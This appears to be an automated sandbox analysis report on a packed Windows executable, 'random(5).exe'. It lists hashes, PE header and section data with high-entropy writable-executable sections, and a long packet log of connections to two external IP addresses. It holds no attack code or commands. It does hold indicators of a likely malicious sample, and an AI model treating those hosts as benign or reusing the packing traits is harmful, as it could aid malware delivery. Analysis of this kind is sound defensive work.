TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	random(5).exe
File size:	4'484'096 bytes
MD5:	f200a3445a8034d201eeb79bb29e1d73
SHA1:	473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
SHA256:	ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
SHA512:	6170ced6054e3df739312e54d89bf969c305b5eb34dff3e1645a11f2614463d41bf1d98a21e94d6b611654e4a0bfae1164c9cfb0e84d8149a15711976a81daa7
SSDEEP:	98304:tteL6ZJc0HazXMrBDxmWsmzM4bLvM17r1hLYe44:bZJB6zXMF9mqM4vvM175ZYe44
TLSH:	D926333FD8A3549BCD11053C646424504BFC1B717FABF08B73EA9A185B6BE30A89D9E1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@..........................0........E...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x10a0000
Entrypoint Section:	.taggant
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007F519CF6F0EAh
cmovp eax, dword ptr [eax+eax+00h]
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74c05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x74b000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x778200	0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc9ec64	0x10	whflkpvn
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc9ec14	0x18	whflkpvn
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x74a000	0x289000	bb5665c7ec03789c4cae8efab810e2fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x74b000	0x2b0	0x200	c23d0a8d303bd845ffc1175accd22166	False	0.80078125	data	5.9750009673578965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x74c000	0x1000	0x200	52564c2cea63394dbc4e71775ebabcc0	False	0.166015625	data	1.1589685166080708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x74d000	0x398000	0x200	d5a968f595dbf17d881e4646af765fe5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
whflkpvn	0xae5000	0x1ba000	0x1ba000	ee64ce26496913dd203454edf9258e5f	False	0.994563728436086	data	7.955966555987466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
esywlygt	0xc9f000	0x1000	0x400	effb0fcc375b15c296df7f70da236699	False	0.7646484375	data	6.013886737052914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xca0000	0x3000	0x2200	5005c7c357368296725d78bd623da61b	False	0.06640625	DOS executable (COM)	0.7367757296076987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc9ec74	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:15:06.876965046 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:06.877002001 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:06.877073050 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:06.887284040 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:06.887296915 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.553427935 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.561655045 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.561674118 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.562725067 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.562793016 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.564064980 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.564176083 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.575813055 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.575820923 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.623521090 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.677716970 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.677829981 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:07.678071976 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.685615063 CET	49710	443	192.168.2.6	34.200.57.114
Jan 2, 2025 09:15:07.685628891 CET	443	49710	34.200.57.114	192.168.2.6
Jan 2, 2025 09:15:09.356427908 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.365911961 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.365993977 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.366978884 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.371841908 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.371855974 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.371891975 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.371901035 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.371912003 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.371915102 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.371953011 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.371969938 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.372028112 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.372035980 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.372044086 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.372047901 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.372107983 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.376492977 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376554966 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.376705885 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376713991 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376745939 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376754999 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376769066 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.376796007 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376801014 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.376805067 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.376863003 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.419063091 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.419253111 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.467052937 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.467178106 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.515033960 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.515099049 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.567019939 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.567112923 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.615035057 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.615151882 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.663044930 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.663114071 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.715050936 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.715174913 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.763072968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.763145924 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.794883966 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.795135975 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.800060034 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800070047 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800086975 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800095081 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800112009 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800121069 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800179005 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800187111 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800226927 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800235987 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800246000 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800306082 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.800313950 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800322056 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800338030 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.800347090 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800355911 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800371885 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800391912 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.800440073 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800601959 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800610065 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800615072 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800678968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800769091 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800776958 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800816059 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800887108 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800915956 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800925016 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800973892 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.800992966 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.801044941 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.801120996 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.801181078 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.805088997 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805154085 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.805166960 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805210114 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.805222988 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805269957 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.805282116 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805320024 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805322886 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.805345058 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805427074 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805434942 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805479050 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805542946 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805583954 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805643082 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805650949 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805668116 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805675030 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805692911 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805701017 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805754900 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805763960 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805819988 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805829048 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805845022 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805852890 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805942059 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.805960894 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806036949 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.806063890 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806073904 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806090117 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806092024 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.806114912 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806122065 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.806160927 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.806175947 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806185007 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806216955 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806226015 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806236029 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.806282043 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806292057 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806319952 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806329966 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806401968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806408882 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806448936 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806457043 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806463003 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806468010 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806483030 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806492090 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806513071 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806521893 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806550980 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806559086 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806605101 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806612968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806657076 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806665897 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806677103 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806684971 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806708097 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806718111 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806744099 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806751966 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806776047 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806783915 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806847095 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806854963 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806862116 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806869984 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806936979 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806946039 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.806948900 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.809899092 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810035944 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810044050 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810081959 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810090065 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810137033 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810151100 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810159922 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810894012 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.810904980 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811068058 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811078072 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811103106 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811110020 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811196089 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811203957 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811249018 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811258078 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811268091 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811300993 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811357021 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811366081 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811433077 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811443090 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811461926 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811470985 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811484098 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.811506987 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811522007 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811553001 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.811562061 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811569929 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811604023 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811614990 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811626911 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811638117 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811672926 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811681032 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811723948 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811732054 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811738968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811748028 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811773062 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811781883 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811799049 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811808109 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811863899 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811873913 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811889887 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811903000 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811919928 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811928034 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811952114 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811959982 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811990023 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.811999083 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812022924 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812037945 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812067986 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812076092 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812129974 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812139034 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.812174082 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816306114 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816411018 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816418886 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816478968 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816488028 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816504002 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816513062 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816566944 CET	80	49711	34.147.147.173	192.168.2.6
